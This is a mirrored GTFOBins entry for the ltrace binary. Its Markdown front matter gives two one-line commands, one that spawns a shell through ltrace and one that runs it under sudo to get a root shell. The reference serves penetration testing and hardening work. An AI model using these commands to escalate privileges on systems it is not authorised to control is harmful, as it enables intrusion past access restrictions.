mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-01-10 01:11:34 +01:00
8 lines
107 B
Markdown
8 lines
107 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: ltrace -b -L /bin/sh
|
|
sudo:
|
|
- code: sudo ltrace -b -L /bin/sh
|
|
---
|